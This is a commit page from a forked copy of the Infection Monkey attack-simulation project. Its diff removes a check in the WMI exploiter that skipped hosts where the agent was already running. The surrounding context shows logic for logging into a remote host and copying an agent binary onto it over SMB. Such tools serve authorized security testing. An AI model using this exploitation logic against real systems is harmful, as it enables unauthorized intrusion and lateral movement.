p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Remove remote check for running monkey in WMI exploiter

This commit is contained in:
vakaris_zilius 2022-03-18 08:43:28 +00:00
parent 54bbe8bf2f
commit b70144f5e1
1 changed files with 0 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
monkey/infection_monkey/exploit/wmiexec.py
View File

@ -68,21 +68,6 @@ class WmiExploiter(HostExploiter):
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
# TODO: This check is racey at best. Is it really necessary? If we execute an agent on
# the victim and there's one already running, it will stop itself.
# query process list and check if monkey already running on victim
process_list = WmiTools.list_object(
wmi_connection,
"Win32_Process",
fields=("Caption",),
where=f"Name='{ntpath.split(self.options['dropper_target_path_win_64'])[-1]}'",
)
if process_list:
wmi_connection.close()
logger.debug("Skipping %r - already infected", self.host)
return self.exploit_result
downloaded_agent = self.agent_repository.get_agent_binary(self.host.os["type"]) downloaded_agent = self.agent_repository.get_agent_binary(self.host.os["type"])
remote_full_path = SmbTools.copy_file( remote_full_path = SmbTools.copy_file(